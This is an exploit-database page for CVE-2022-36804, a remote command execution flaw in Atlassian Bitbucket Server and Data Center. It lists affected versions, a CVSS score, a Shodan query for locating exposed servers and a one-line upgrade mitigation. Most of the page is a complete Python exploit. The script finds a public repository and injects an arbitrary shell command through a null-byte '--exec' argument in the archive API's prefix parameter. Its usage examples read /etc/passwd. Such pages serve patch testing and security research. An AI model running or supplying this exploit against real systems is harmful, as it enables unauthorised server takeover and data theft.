Bitbucket v7.0.0 - RCE - exploit.company

vendor:

Bitbucket Server and Data Center

by:

khal4n1

8.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Bitbucket Server and Data Center

Affected Version From: 7.0.0

Affected Version To: 8.3.2001

Patch Exists: YES

Related CWE: CVE-2022-36804

CPE: 2.3:a:atlassian:bitbucket_server_and_data_center

Metasploit: https://www.rapid7.com/db/vulnerabilities/atlassian-bitbucket-cve-2022-36804/

Other Scripts:

Tags: packetstorm,cve,cve2022,bitbucket,atlassian,kev

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://github.com/notdls/CVE-2022-36804, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804, https://jira.atlassian.com/browse/BSERV-13438, https://nvd.nist.gov/vuln/detail/CVE-2022-36804, http://packetstormsecurity.com/files/171453/Bitbucket-7.0.0-Remote-Command-Execution.html

Nuclei Metadata: {'max-request': 2, 'shodan-query': 'http.component:"BitBucket"', 'vendor': 'atlassian', 'product': 'bitbucket'}

Platforms Tested: Kali and Ubuntu LTS 22.04

2022

Bitbucket v7.0.0 – RCE

The exploit is used to exploit a vulnerability present in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1. The exploit is used to execute a command on the server and the server will send a 500 http response with the stout output from the command executed.

Mitigation:

Upgrade to the latest version of Bitbucket Server and Data Center.

Source

Exploit-DB raw data:

# Exploit Title: Bitbucket v7.0.0 -  RCE
# Date: 09-23-2022
# Exploit Author: khal4n1
# Vendor Homepage: https://github.com/khal4n1
# Tested on: Kali and ubuntu LTS 22.04
# CVE : cve-2022-36804

#****************************************************************#
#The following exploit is used to exploit a vulnerability present
#Atlassian Bitbucket Server and Data Center 7.0.0 before version
#7.6.17, from version 7.7.0 before version 7.17.10, from version
#7.18.0 before version 7.21.4, from version 8.0.0 before version
#8.0.3, from version 8.1.0 before version 8.1.3, and from version
#8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1

#Usage Example

# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'

# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'

#The server will send a 500 http response with the stout output from the
# command  executed.


#****************************************************************#

#!/usr/bin/python3

import argparse
import urllib
from urllib import request
import re

#argument setup
parser = argparse.ArgumentParser(description='Program to test
bitbucket vulnerability CVE-2022-36804')
parser.add_argument("--url", help="Set the target to attack.
[REQUIRED]", required=True )
parser.add_argument("--cmd", help="Set the command to execute.
[DEFAULT ID]", required=True, default='id')
args = parser.parse_args()
cmd= urllib.parse.quote(args.cmd)


#reads from the public repository what is available
requ = request.urlopen(args.url+ "/repos?visibility=public")
response = requ.read()

#select a public project and stores it in a variable
project = re.findall('7990/projects/(.*)/repos/',
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]

#Selects a public repo and stores it in a vatiable
file = re.findall('/repos/(.*)/browse',
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]

# Exploitation
try :
        attack = request.urlopen(args.url +
"/rest/api/latest/projects/" + project + "/repos/" + file +
"/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin")
        print (attack.response())
except urllib.error.HTTPError as e:
        body = e.read().decode()  # Read the body of the error response
        print (body)